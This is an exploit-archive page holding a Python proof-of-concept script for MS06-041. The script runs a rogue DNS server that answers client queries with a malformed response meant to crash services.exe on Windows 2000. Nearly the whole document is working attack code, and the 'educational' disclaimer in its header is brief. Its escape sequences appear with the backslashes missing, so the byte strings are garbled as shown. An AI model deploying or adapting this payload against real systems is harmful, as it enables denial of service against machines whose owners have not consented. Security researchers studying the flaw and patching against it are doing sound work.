[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041)
# Published : 2006-12-09
# Author : Winny Thomas
# Previous Title : Sophos / Trend Micro Antivirus RAR File Denial of Service PoC
# Next Title : Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit
#!/usr/bin/python
#POC for MS06-041
#Run the python script passing the local ip address as parameter. The DNS server
#will start listening on this ip address for DNS hostname resolution queries.
#This script is for testing and educational purpose and so to test this one will
#have to point the DNS resolver on the target/client to the ip address on which
#this script runs.
#Open up internet explorer and type in a hostname. services.exe will crash.
#You may have to repeat this two or three times to see the crash in services.exe
# Tested on Windows 2000 server SP0 and SP1 inside VmWare. Could not
# reproduce on SP4 though it is also vulnerable. May be I missed something :)
#
# For testing/educational purpose. Author shall bear no responsibility for any screw ups
# Winny Thomas ;-)
import sys
import struct
import socket
class DNSserver:
def __init__(self, localhost):
self.response = ''
self.__create_socket(localhost)
def __create_socket(self, localhost):
self.host = localhost
self.port = 53
self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.DNSsocket.bind((self.host, self.port))
print 'Awaiting DNS queries'
print '====================n'
while 1:
self.__await_query()
def __await_query(self):
self.Query, self.Addr = self.DNSsocket.recvfrom(1024)
print 'Query from: ' + str(self.Addr)
self.TransactID = self.Query[0:2]
self.__find_type(self.Query[2:])
def __find_type(self, Question):
qType = struct.unpack('>H', Question[0:2])
if qType[0] == 256:
self.__send_response(Question[10:-4])
def __send_response(self, sName):
self.response = self.TransactID
self.response += 'x85x80' #Flags
self.response += 'x00x01' #Questions
self.response += 'x00x02' #Answer RR's
self.response += 'x00x01' #Authority RR
self.response += 'x00x00' #Additional RR
#QUERIES
#self.response += sName
self.response += 'x04x74x65x73x74x07x68x61x63x6bx65'
self.response += 'x72x73x03x63x6fx6dx00'
self.response += 'x00xff' #request all records
self.response += 'x00x01' #inet class
#ANSWERS
#A record
self.response += 'xc0x0cx00x01x00x01x00x00x00x07'
self.response += 'x00x04xc0xa8x00x02' #A type record (IP add)
#TXT record
self.response += 'xc0x0cx00x10x00x01x00x00x00x07'
self.response += 'x00x18' #TXT record length
self.response += 'x08x50x52x4fx54x4fx43x4fx4c'
self.response += 'x00' #Zero length TXT RDATA
self.response += 'x00' #Zero length TXT RDATA
self.response += 'x08x50x52x4fx54x4fx43x4fx4c'
self.response += 'x00' #Zero length TXT RDATA
self.response += 'x00' #Zero length TXT RDATA
self.response += 'x01x41'
#Authoritative Nameservers
self.response += 'xc0x11x00x02x00x01x00x01x51x80'
self.response += 'x00x0bx08x73x63x6fx72x70x69x6f'
self.response += 'x6exc0x11'
self.DNSsocket.sendto(self.response, (self.Addr))
if __name__ == '__main__':
try:
localhost = sys.argv[1]
except IndexError:
print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]
sys.exit(-1)
D = DNSserver(localhost)
# www.Syue.com [2006-12-09]